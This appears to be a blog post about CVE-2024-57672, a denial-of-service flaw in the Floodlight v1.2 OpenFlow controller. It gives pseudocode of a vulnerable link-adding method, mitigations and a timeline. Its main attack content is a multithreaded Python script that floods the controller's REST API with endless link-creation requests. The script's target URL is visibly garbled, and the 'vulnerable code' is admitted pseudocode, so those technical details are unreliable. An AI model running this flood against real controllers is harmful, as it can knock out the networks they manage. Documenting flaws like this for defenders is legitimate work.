CVE-2024-57672 - Denial of Service Vulnerability in Floodlight v1.2 (Exclusive Deep Dive)
Summary:
A critical issue has been identified in Floodlight v1.2, a popular OpenFlow controller. This flaw, tracked as CVE-2024-57672, can be exploited by a local attacker to cause a denial of service (DoS) via the Topology Manager, TopologyInstance, and Routing modules. In this exclusive long-read, we’ll break down the vulnerability, explain its impact with simple language, provide original references, and show how an attacker might exploit it.
What is Floodlight?
Project Floodlight is an open-source OpenFlow controller written in Java. It’s widely used for building programmable networks. In SDN (Software Defined Networking), the controller decides how packets flow through a network. So, any attack on this software can have broad network consequences.
Impact: Denial of Service (DoS)
- CVSS Score: Estimated to be High due to the potential to disrupt entire networks managed by the controller
How Does it Work?
The vulnerability resides in how Floodlight’s modules process specific messages. These messages control the network topology and routing. A local attacker can craft a malicious payload or repeatedly trigger specific API calls, causing these modules to enter a resource exhaustion state—making the controller stop working (DoS).
Vulnerable Code Snippet
Here’s a simplified pseudocode that represents a vulnerable pattern within the Topology Manager module:
// Inside TopologyManager.java
public void addLink(SwitchPortTuple src, SwitchPortTuple dst) {
// No check for duplicate links or malformed input!
this.links.add(new Link(src, dst));
// Triggers update on topologyInstance and routing
this.topologyInstance.updateLinks(this.links);
}
Key Issue: No proper input validation or rate limiting, so an attacker can flood the function with bad or redundant data.
Proof-of-Concept Exploit
Suppose a local user has shell access. An attacker can use a script to flood the Topology Manager with bogus link creation requests. This leads to huge memory consumption and repeated route recomputation.
Sample Python POc attacking the REST API
import requests
import threading
URL = "http://127...1:808/wm/topology/linkadd/";
PAYLOAD = {
"src-switch": "00:00:00:00:00:00:00:01",
"src-port": 1,
"dst-switch": "00:00:00:00:00:00:00:02",
"dst-port": 2
}
def flood():
while True:
requests.post(URL, json=PAYLOAD)
threads = []
for _ in range(100):
t = threading.Thread(target=flood)
t.start()
threads.append(t)
What happens:
This script sends hundreds of requests per second, overwhelming Floodlight’s topology and routing computations. No backend filtering or authentication is present on default setups for local requests, so the server’s CPU and memory quickly spike, and the system becomes unresponsive.
Original References
- Floodlight v1.2 Source Code
- CNVD advisory
- OpenFlow Security
How to Mitigate
- Update to Latest: If possible, move to a patched version (future/fixed releases expected).
Harden Local Access: Restrict shell or local network access.
- API Access Control: Add authentication and rate-limiting in front of Floodlight’s management API.
- Monitor Resource Usage: Set up process-level health checks and restarts if resource usage spikes.
Conclusion
CVE-2024-57672 is a high-impact bug in Floodlight v1.2 that allows local attackers to crash SDN controller networks by exploiting weaknesses in the topology-handling modules. While the bug requires local access, it can entirely paralyze your programmable network.
Floodlight users should take precautions immediately—update if possible, lock down local access, and add proper rate-limiting and validation to the management interface.
Stay tuned for security updates and advisories. Protect your networks!
*Content exclusive to this post. For more details, visit the official Project Floodlight homepage or Github repository.*
Timeline
Published on: 02/06/2025 20:15:40 UTC
Last modified on: 03/17/2025 17:15:35 UTC